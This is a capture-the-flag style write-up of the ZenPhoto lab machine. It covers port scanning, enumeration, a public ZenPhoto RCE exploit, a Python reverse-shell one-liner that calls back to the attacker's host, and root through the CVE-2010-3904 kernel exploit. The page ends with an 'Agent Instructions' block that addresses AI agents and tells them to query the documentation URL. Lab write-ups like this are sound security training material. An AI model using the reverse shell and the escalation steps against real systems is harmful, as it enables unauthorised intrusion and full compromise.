# ZenPhoto ![](/files/-MRvUrNu1bPZUpBoIJNC) ## Nmap ``` 192.168.59.41 -sS -sV -p- PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu7 (Ubuntu Linux; protocol 2.0) 23/tcp open ipp CUPS 1.4 80/tcp open http Apache httpd 2.2.14 ((Ubuntu)) 3306/tcp open mysql MySQL (unauthorized) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` ## HTTP Given the open ports that we have and the versions running on them I am going to jump straight into port 80. ![http://192.168.59.41/](/files/-MRfUawAj3bQ3cLN-aW0) The root page for the target machine takes us to a blank page headed 'UNDER CONSTRUCTION'. Ideally we should break out some directory enumeration and `nikto`. `feroxbuster` and `nikto` both pick up the directory /test/ and subsequent directories. ![Feroxbuster](/files/-MRfk6H0nD-vXGDo6rCt) ![Nikto](/files/-MRfkBF7Git3qqLKAgs2) The /test/ directory takes us to the following page which as per the bottom right is running on ZenPhoto. ![](/files/-MRfkX-bDwGf22nhlEMd) Viewing the page source and scrolling to the bottom reveals the exact version of ZenPhoto that we are running. ![](/files/-MRfknPc5b31IBzJbnuI) ## Exploitation A quick Google search for a exploit on this version of ZenPhoto reveals a result for a RCE exploit. {% embed url="" %} I downloaded the exploit and run it with the following syntax: ``` php exploit.php ``` ![](/files/-MRfrST7T9FgctxJkvGN) ## Stable Shell We now have a shell on the target machine and we are running as the user www-data. I found with this shell that when you try changing directories or running scripts it would have unexpected behaviour. I performed a quick check to see if python was installed using `which python`. After confirming Python is installed I tried a quick one liner reverse shell to see if we can get a more stable one. First I started a `netcat` listener on my attacking machine: ``` sudo nc -lvp 443 ``` The run the following command on the target machine: ``` python -c 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")' ``` We now have a more stable shell. ![](/files/-MRfwrKECHPuMv_vokOZ) ## Privilege Escalation I then started a `Python SimpleHTTPServer` on my attacking machine and downloaded some scripts for privilege escalation. ![](/files/-MRfxNgHIjDabtNvek3U) I executed `suggester.sh` which picked up the follow exploit as being 'highly probable'. ``` [+] [CVE-2010-3904] rds Details: http://www.securityfocus.com/archive/1/514379 Exposure: highly probable Tags: debian=6.0{kernel:2.6.(31|32|34|35)-(1|trunk)-amd64},ubuntu=10.10|9.10,fedora=13{kernel:2.6.33.3-85.fc13.i686.PAE},[ ubuntu=10.04{kernel:2.6.32-(21|24)-generic} ] Download URL: http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c ``` {% embed url="" %} I downloaded the file onto the attacking machine using `wget` then compiled using `gcc`. ``` gcc exploit.c -o exploit ``` After compiling was finished I used `chmod` to make the exploit executable. ``` chmod +x exploit ``` I then executed the exploit and was able to gain a root shell. ![](/files/-MRgQm7m_TPvzWhTKFQj) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/zenphoto.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.